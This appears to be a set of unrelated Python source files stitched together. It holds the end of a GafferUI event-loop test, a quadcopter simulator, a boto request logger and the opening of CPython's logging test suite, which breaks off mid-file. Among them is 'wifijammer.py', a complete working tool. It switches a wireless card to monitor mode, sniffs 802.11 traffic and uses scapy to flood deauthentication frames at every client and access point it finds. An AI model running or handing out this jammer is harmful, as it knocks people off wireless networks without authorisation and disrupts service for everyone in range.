GafferUI.EventLoop.addIdleCallback( thread.start )
GafferUI.EventLoop.mainEventLoop().start()
thread.join()
self.assertEqual( self.__uiThreadFunctionCalled, True )
self.assertEqual( self.__uiThreadCalledOnCorrectThread, True )
self.assertEqual( self.__uiThreadResult, 101 )
def testExecuteOnUITheadAndDontWaitForResult( self ) :
def f() :
time.sleep( 2 )
GafferUI.EventLoop.mainEventLoop().stop()
self.__uiThreadFunctionCalled = True
self.__uiThreadCalledOnCorrectThread = QtCore.QThread.currentThread() == QtWidgets.QApplication.instance().thread()
return 101
def t() :
st = time.time()
self.__uiThreadResult = GafferUI.EventLoop.executeOnUIThread( f, waitForResult=False )
self.__executeOnUIThreadDuration = time.time() - st
thread = threading.Thread( target = t )
GafferUI.EventLoop.addIdleCallback( thread.start )
GafferUI.EventLoop.mainEventLoop().start()
thread.join()
self.assertEqual( self.__uiThreadFunctionCalled, True )
self.assertEqual( self.__uiThreadCalledOnCorrectThread, True )
self.assertEqual( self.__uiThreadResult, None )
# we shouldn't be waiting for the result of ui thread, so the return should be quicker
# than the actual function called
self.assertLess( self.__executeOnUIThreadDuration, 2 )
def testExceptionsInIdleCallbacks( self ) :
self.__idle1Calls = 0
self.__idle2Calls = 0
def idle1() :
self.__idle1Calls += 1
raise RuntimeError( "I am a very naughty boy" )
def idle2() :
self.__idle2Calls += 1
return True
def stop() :
if self.__idle2Calls==4 :
GafferUI.EventLoop.mainEventLoop().stop()
return False
return True
GafferUI.EventLoop.addIdleCallback( idle1 )
GafferUI.EventLoop.addIdleCallback( idle2 )
GafferUI.EventLoop.addIdleCallback( stop )
mh = IECore.CapturingMessageHandler()
with mh :
GafferUI.EventLoop.mainEventLoop().start()
self.assertEqual( self.__idle1Calls, 1 )
self.assertGreaterEqual( self.__idle2Calls, 4 )
self.assertEqual( len( mh.messages ), 1 )
self.assertEqual( mh.messages[0].level, IECore.Msg.Level.Error )
self.assertIn( "I am a very naughty boy", mh.messages[0].message )
def testExecuteOnUITheadFromUIThread( self ) :
# if we're on the ui thread already when we call executeOnUIThread(),
# then our function should be called immediately.
self.__executed = False
def f() :
self.__executed = True
return 10
r = GafferUI.EventLoop.executeOnUIThread( f )
self.assertEqual( r, 10 )
self.assertEqual( self.__executed, True )
def testAddIdleCallbackFromIdleCallback( self ) :
self.__runOnceCalls = 0
self.__addRunOnceCalls = 0
def runOnce() :
self.__runOnceCalls += 1
return False # so we're removed immediately
def addRunOnce() :
self.__addRunOnceCalls += 1
if self.__addRunOnceCalls==2 :
GafferUI.EventLoop.mainEventLoop().stop()
return False
GafferUI.EventLoop.mainEventLoop().addIdleCallback( runOnce )
return True
GafferUI.EventLoop.addIdleCallback( runOnce )
GafferUI.EventLoop.addIdleCallback( addRunOnce )
GafferUI.EventLoop.mainEventLoop().start()
self.assertEqual( self.__runOnceCalls, 2 )
self.assertEqual( self.__addRunOnceCalls, 2 )
def setUp( self ) :
GafferUITest.TestCase.setUp( self )
self.__uiThreadFunctionCalled = False
self.__uiThreadCalledOnCorrectThread = False
self.__uiThreadResult = None
self.__executeOnUIThreadDuration = 10000
if __name__ == "__main__":
unittest.main()
|
wifijammer.py
|
#!/usr/bin/env python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy
from scapy.all import *
conf.verb = 0 # Scapy I thought I told you to shut up
import os
import sys
import time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
import argparse
import socket
import struct
import fcntl
import re  # used by iwconfig(); not guaranteed to be re-exported by scapy.all
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
def parse_args():
#Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--skip", help="Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-i", "--interface", help="Choose monitor mode interface. By default script will find the most powerful interface and starts monitor mode on it. Example: -i mon5")
parser.add_argument("-c", "--channel", help="Listen on and deauth only clients on the specified channel. Example: -c 6")
parser.add_argument("-m", "--maximum", help="Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5")
parser.add_argument("-n", "--noupdate", help="Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n", action='store_true')
parser.add_argument("-t", "--timeinterval", help="Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001")
parser.add_argument("-p", "--packets", help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2")
parser.add_argument("-d", "--directedonly", help="Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs", action='store_true')
return parser.parse_args()
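# Illustrative invocations (added for reference; flags map to the arguments
# defined above, and root is required, as checked in the main block below):
#   sudo python wifijammer.py                # hop channels 1-11, deauth every client/AP seen
#   sudo python wifijammer.py -c 6 -p 2 -d   # stay on channel 6, 2 packets per burst,
#                                            # directed client/AP deauths only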
########################################
# Begin interface info and manipulation
########################################
def get_mon_iface(args):
global monitor_on
monitors, interfaces = iwconfig()
if args.interface:
monitor_on = True
return args.interface
if len(monitors) > 0:
monitor_on = True
return monitors[0]
else:
# Start monitor mode on a wireless interface
print '['+G+'*'+W+'] Finding the most powerful interface...'
interface = get_iface(interfaces)
monmode = start_mon_mode(interface)
return monmode
def iwconfig():
monitors = []
interfaces = {}
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue # Skip empty lines
if line[0] != ' ': # Doesn't start with space
wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
if not wired_search: # Isn't wired
iface = line[:line.find(' ')] # is the interface
if 'Mode:Monitor' in line:
monitors.append(iface)
elif 'IEEE 802.11' in line:
if "ESSID:\"" in line:
interfaces[iface] = 1
else:
interfaces[iface] = 0
return monitors, interfaces
def get_iface(interfaces):
scanned_aps = []
if len(interfaces) < 1:
sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
if len(interfaces) == 1:
for interface in interfaces:
return interface
# Find most powerful interface
for iface in interfaces:
count = 0
proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if ' - Address:' in line: # first line in iwlist scan for a new AP
count += 1
scanned_aps.append((count, iface))
print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
try:
interface = max(scanned_aps)[1]
return interface
except Exception as e:
for iface in interfaces:
interface = iface
print '['+R+'-'+W+'] Minor error:',e
print ' Starting monitor mode on '+G+interface+W
return interface
def start_mon_mode(interface):
print '['+G+'+'+W+'] Starting monitor mode on '+G+interface+W
try:
os.system('ifconfig %s down' % interface)
os.system('iwconfig %s mode monitor' % interface)
os.system('ifconfig %s up' % interface)
return interface
except Exception:
sys.exit('['+R+'-'+W+'] Could not start monitor mode')
def remove_mon_iface(mon_iface):
os.system('ifconfig %s down' % mon_iface)
os.system('iwconfig %s mode managed' % mon_iface)
os.system('ifconfig %s up' % mon_iface)
def mon_mac(mon_iface):
'''
http://stackoverflow.com/questions/159137/getting-mac-address
'''
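# 0x8927 is SIOCGIFHWADDR; the ioctl fills an ifreq struct in which bytes
# 18:24 carry the interface's hardware (MAC) address, formatted below.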
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
return mac
########################################
# End of interface info and manipulation
########################################
def channel_hop(mon_iface, args):
'''
First time it runs through the channels it stays on each channel for 5 seconds
in order to populate the deauth list nicely. After that it goes as fast as it can
'''
global monchannel, first_pass
channelNum = 0
while 1:
if args.channel:
with lock:
monchannel = args.channel
else:
channelNum +=1
if channelNum > 11:
channelNum = 1
with lock:
first_pass = 0
with lock:
monchannel = str(channelNum)
proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
err = None
for line in proc.communicate()[1].split('\n'):
if len(line) > 2: # iw dev shouldn't display output unless there's an error
err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
output(err, monchannel)
deauth(monchannel)
if first_pass == 1:
time.sleep(1)
def deauth(monchannel):
'''
addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
multi-APs to one gateway. Constantly scans the clients_APs list and
starts a thread to deauth each instance
'''
global first_pass
if first_pass == 1:
return
pkts = []
if len(clients_APs) > 0:
with lock:
for x in clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
# Can't add a RadioTap() layer as the first layer or it's a malformed
# Association request packet?
# Append the packets to a new list so we don't have to hog the lock
# Deauthentication frames are management frames: type=0, subtype=12
if ch == monchannel:
deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
if len(APs) > 0:
if not args.directedonly:
with lock:
for a in APs:
ap = a[0]
ch = a[1]
if ch == monchannel:
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
pkts.append(deauth_ap)
if len(pkts) > 0:
# prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
if not args.timeinterval:
args.timeinterval = 0
if not args.packets:
args.packets = 1
for p in pkts:
send(p, inter=float(args.timeinterval), count=int(args.packets))
#pass
#time.sleep(.5)
def output(err, monchannel):
os.system('clear')
if err:
print err
else:
print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n'
if len(clients_APs) > 0:
print ' Deauthing ch ESSID'
# Print the deauth list
with lock:
for ca in clients_APs:
if len(ca) > 3:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
else:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
if len(APs) > 0:
print '\n Access Points ch ESSID'
with lock:
for ap in APs:
print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
print ''
def cb(pkt):
'''
Look for dot11 packets that aren't to or from broadcast address,
are type 1 or 2 (control, data), and append the addr1 and addr2
to the list of deauth targets.
'''
global clients_APs, APs
# return these if's keeping clients_APs the same or just reset clients_APs?
# I like the idea of the tool repopulating the variable more
if args.maximum:
if args.noupdate:
if len(clients_APs) > int(args.maximum):
return
else:
if len(clients_APs) > int(args.maximum):
with lock:
clients_APs = []
APs = []
# Broadcast, null address, IPv6 mcast, IPv6 mcast, spanning tree, IPv4 mcast, our own MAC
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
if args.skip:
ignore.append(args.skip)
# We're adding the AP and channel to the deauth list at time of creation rather
# than updating on the fly in order to avoid costly for loops that require a lock
if pkt.haslayer(Dot11):
if pkt.addr1 and pkt.addr2:
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
APs_add(clients_APs, APs, pkt)
for i in ignore:
if i in pkt.addr1 or i in pkt.addr2:
return
# Control frames = 1, data frames = 2 (management beacons/probe responses were handled above)
if pkt.type in [1, 2]:
clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3
try:
# Thanks to airoscapy for below: the third Dot11Elt is normally the
# DS Parameter Set, whose single info byte is the AP's channel number
ap_channel = str(ord(pkt[Dot11Elt:3].info))
# Prevent 5GHz APs from being thrown into the mix
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11']
if ap_channel not in chans:
return
except Exception as e:
return
if len(APs) == 0:
with lock:
return APs.append([bssid, ap_channel, ssid])
else:
for b in APs:
if bssid in b[0]:
return
with lock:
return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
if len(clients_APs) == 0:
if len(APs) == 0:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
else:
AP_check(addr1, addr2)
# Append new clients/APs if they're not in the list
else:
for ca in clients_APs:
if addr1 in ca and addr2 in ca:
return
if len(APs) > 0:
return AP_check(addr1, addr2)
else:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
def AP_check(addr1, addr2):
for ap in APs:
if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
with lock:
return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def stop(signal, frame):
if monitor_on:
sys.exit('\n['+R+'!'+W+'] Closing')
else:
remove_mon_iface(mon_iface)
sys.exit('\n['+R+'!'+W+'] Closing')
if __name__ == "__main__":
if os.geteuid():
sys.exit('['+R+'-'+W+'] Please run as root')
clients_APs = []
APs = []
DN = open(os.devnull, 'w')
lock = Lock()
args = parse_args()
monitor_on = None
mon_iface = get_mon_iface(args)
conf.iface = mon_iface
mon_MAC = mon_mac(mon_iface)
first_pass = 1
# Start channel hopping
hop = Thread(target=channel_hop, args=(mon_iface, args))
hop.daemon = True
hop.start()
signal(SIGINT, stop)
try:
sniff(iface=mon_iface, store=0, prn=cb)
except Exception as msg:
remove_mon_iface(mon_iface)
print '\n['+R+'!'+W+'] Closing'
sys.exit(0)
|
quadcopter.py
|
import numpy as np
import math
import scipy.integrate
import time
import datetime
import threading
class Propeller():
def __init__(self, prop_dia, prop_pitch, thrust_unit='N'):
self.dia = prop_dia
self.pitch = prop_pitch
self.thrust_unit = thrust_unit
self.speed = 0 #RPM
self.thrust = 0
def set_speed(self,speed):
self.speed = speed
# From http://www.electricrcaircraftguy.com/2013/09/propeller-static-dynamic-thrust-equation.html
self.thrust = 4.392e-8 * self.speed * math.pow(self.dia,3.5)/(math.sqrt(self.pitch))
self.thrust = self.thrust*(4.23e-4 * self.speed * self.pitch)
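# Note (added): the two lines above are the static-thrust case
# (freestream velocity V0 = 0) of the dynamic thrust equation from the
# link above:
#   F [N] = 4.392e-8 * RPM * d^3.5 / sqrt(pitch) * (4.23e-4 * RPM * pitch - V0)
# with the diameter d and pitch given in inches.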
if self.thrust_unit == 'Kg':
self.thrust = self.thrust*0.101972
class Quadcopter():
# State space representation: [x y z x_dot y_dot z_dot theta phi gamma theta_dot phi_dot gamma_dot]
# From Quadcopter Dynamics, Simulation, and Control by Andrew Gibiansky
def __init__(self,quads,gravity=9.81,b=0.0245):
self.quads = quads
self.g = gravity
self.b = b
self.thread_object = None
self.ode = scipy.integrate.ode(self.state_dot).set_integrator('vode',nsteps=500,method='bdf')
self.time = datetime.datetime.now()
for key in self.quads:
self.quads[key]['state'] = np.zeros(12)
self.quads[key]['state'][0:3] = self.quads[key]['position']
self.quads[key]['state'][6:9] = self.quads[key]['orientation']
self.quads[key]['m1'] = Propeller(self.quads[key]['prop_size'][0],self.quads[key]['prop_size'][1])
self.quads[key]['m2'] = Propeller(self.quads[key]['prop_size'][0],self.quads[key]['prop_size'][1])
self.quads[key]['m3'] = Propeller(self.quads[key]['prop_size'][0],self.quads[key]['prop_size'][1])
self.quads[key]['m4'] = Propeller(self.quads[key]['prop_size'][0],self.quads[key]['prop_size'][1])
# From Quadrotor Dynamics and Control by Randal Beard
ixx=((2*self.quads[key]['weight']*self.quads[key]['r']**2)/5)+(2*self.quads[key]['weight']*self.quads[key]['L']**2)
iyy=ixx
izz=((2*self.quads[key]['weight']*self.quads[key]['r']**2)/5)+(4*self.quads[key]['weight']*self.quads[key]['L']**2)
self.quads[key]['I'] = np.array([[ixx,0,0],[0,iyy,0],[0,0,izz]])
self.quads[key]['invI'] = np.linalg.inv(self.quads[key]['I'])
self.run = True
def rotation_matrix(self,angles):
ct = math.cos(angles[0])
cp = math.cos(angles[1])
cg = math.cos(angles[2])
st = math.sin(angles[0])
sp = math.sin(angles[1])
sg = math.sin(angles[2])
R_x = np.array([[1,0,0],[0,ct,-st],[0,st,ct]])
R_y = np.array([[cp,0,sp],[0,1,0],[-sp,0,cp]])
R_z = np.array([[cg,-sg,0],[sg,cg,0],[0,0,1]])
R = np.dot(R_z, np.dot( R_y, R_x ))
return R
def wrap_angle(self,val):
return( ( val + np.pi) % (2 * np.pi ) - np.pi )
def state_dot(self, time, state, key):
state_dot = np.zeros(12)
# The velocities (t+1 x_dots equal the t x_dots)
state_dot[0] = self.quads[key]['state'][3]
state_dot[1] = self.quads[key]['state'][4]
state_dot[2] = self.quads[key]['state'][5]
# The acceleration
x_dotdot = np.array([0,0,-self.quads[key]['weight']*self.g]) + np.dot(self.rotation_matrix(self.quads[key]['state'][6:9]),np.array([0,0,(self.quads[key]['m1'].thrust + self.quads[key]['m2'].thrust + self.quads[key]['m3'].thrust + self.quads[key]['m4'].thrust)]))/self.quads[key]['weight']
state_dot[3] = x_dotdot[0]
state_dot[4] = x_dotdot[1]
state_dot[5] = x_dotdot[2]
# The angular rates (t+1 theta_dots equal the t theta_dots)
state_dot[6] = self.quads[key]['state'][9]
state_dot[7] = self.quads[key]['state'][10]
state_dot[8] = self.quads[key]['state'][11]
# The angular accelerations
omega = self.quads[key]['state'][9:12]
tau = np.array([self.quads[key]['L']*(self.quads[key]['m1'].thrust-self.quads[key]['m3'].thrust), self.quads[key]['L']*(self.quads[key]['m2'].thrust-self.quads[key]['m4'].thrust), self.b*(self.quads[key]['m1'].thrust-self.quads[key]['m2'].thrust+self.quads[key]['m3'].thrust-self.quads[key]['m4'].thrust)])
omega_dot = np.dot(self.quads[key]['invI'], (tau - np.cross(omega, np.dot(self.quads[key]['I'],omega))))
state_dot[9] = omega_dot[0]
state_dot[10] = omega_dot[1]
state_dot[11] = omega_dot[2]
return state_dot
def update(self, dt):
for key in self.quads:
self.ode.set_initial_value(self.quads[key]['state'],0).set_f_params(key)
self.quads[key]['state'] = self.ode.integrate(self.ode.t + dt)
self.quads[key]['state'][6:9] = self.wrap_angle(self.quads[key]['state'][6:9])
self.quads[key]['state'][2] = max(0,self.quads[key]['state'][2])
def set_motor_speeds(self,quad_name,speeds):
self.quads[quad_name]['m1'].set_speed(speeds[0])
self.quads[quad_name]['m2'].set_speed(speeds[1])
self.quads[quad_name]['m3'].set_speed(speeds[2])
self.quads[quad_name]['m4'].set_speed(speeds[3])
def get_position(self,quad_name):
return self.quads[quad_name]['state'][0:3]
def get_linear_rate(self,quad_name):
return self.quads[quad_name]['state'][3:6]
def get_orientation(self,quad_name):
return self.quads[quad_name]['state'][6:9]
def get_angular_rate(self,quad_name):
return self.quads[quad_name]['state'][9:12]
def get_state(self,quad_name):
return self.quads[quad_name]['state']
def set_position(self,quad_name,position):
self.quads[quad_name]['state'][0:3] = position
def set_orientation(self,quad_name,orientation):
self.quads[quad_name]['state'][6:9] = orientation
def get_time(self):
return self.time
def thread_run(self,dt,time_scaling):
rate = time_scaling*dt
last_update = self.time
while(self.run==True):
time.sleep(0)
self.time = datetime.datetime.now()
if (self.time-last_update).total_seconds() > rate:
self.update(dt)
last_update = self.time
def start_thread(self,dt=0.002,time_scaling=1):
self.thread_object = threading.Thread(target=self.thread_run,args=(dt,time_scaling))
self.thread_object.start()
def stop_thread(self):
self.run = False
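# Minimal usage sketch (added; not part of the original module). The quad
# parameters below are made up but dimensionally plausible; only the keys
# that __init__ and state_dot actually read are supplied.
if __name__ == "__main__":
    quads = {
        'q1': {
            'position': [0.0, 0.0, 1.0],    # m
            'orientation': [0.0, 0.0, 0.0], # rad (theta, phi, gamma)
            'L': 0.3,                       # arm length, m
            'r': 0.1,                       # central sphere radius, m
            'prop_size': [10.0, 4.5],       # diameter, pitch (inches)
            'weight': 1.2,                  # kg
        }
    }
    quad = Quadcopter(quads)
    quad.set_motor_speeds('q1', [6000.0, 6000.0, 6000.0, 6000.0])
    for _ in range(100):                    # 0.2 s of simulated time at dt = 0.002 s
        quad.update(0.002)
    print(quad.get_position('q1'))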
|
requestlog.py
|
import sys
from datetime import datetime
from threading import Thread
import Queue
from boto.utils import RequestHook
from boto.compat import long_type
class RequestLogger(RequestHook):
"""
This class implements a request logger that uses a single thread to
write to a log file.
"""
def __init__(self, filename='/tmp/request_log.csv'):
self.request_log_file = open(filename, 'w')
self.request_log_queue = Queue.Queue(100)
Thread(target=self._request_log_worker).start()
def handle_request_data(self, request, response, error=False):
len = 0 if error else response.getheader('Content-Length')
now = datetime.now()
time = now.strftime('%Y-%m-%d %H:%M:%S')
td = (now - request.start_time)
duration = (td.microseconds + long_type(td.seconds + td.days * 24 * 3600) * 1e6) / 1e6
# write output including timestamp, status code, response time, response size, request action
self.request_log_queue.put("'%s', '%s', '%s', '%s', '%s'\n" % (time, response.status, duration, len, request.params['Action']))
def _request_log_worker(self):
while True:
try:
item = self.request_log_queue.get(True)
self.request_log_file.write(item)
self.request_log_file.flush()
self.request_log_queue.task_done()
except:
import traceback
traceback.print_exc(file=sys.stdout)
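# Usage sketch (an assumption, not part of this file): a boto connection
# that supports request hooks can be pointed at this logger, e.g.
#
#     conn.set_request_hook(RequestLogger('/tmp/request_log.csv'))
#
# after which each request/response pair is appended to the CSV as
# "timestamp, status, duration, response size, action", matching the row
# format written by handle_request_data() above.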
|
test_logging.py
|
#!/usr/bin/env python
#
# Copyright 2001-2011 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2011 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import datetime
import pickle
import io
import gc
import json
import os
import queue
import re
import select
import socket
from socketserver import ThreadingTCPServer, StreamRequestHandler
import struct
import sys
import tempfile
from test.support import captured_stdout, run_with_locale, run_unittest
from test.support import TestHandler, Matcher
import textwrap
import unittest
import warnings
import weakref
try:
import threading
except ImportError:
threading = None
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers: one non-ASCII and one Unicode.
# This is to test correct operation when sorting existing
# loggers in the configuration code. See issue 8201.
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
try:
stream.reset()
actual_lines = stream.readlines()
except AttributeError:
# StringIO.StringIO lacks a reset() method.
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values),
'%s vs. %s' % (actual_lines, expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warn(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warn(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warn(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warn(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warn(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warn(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
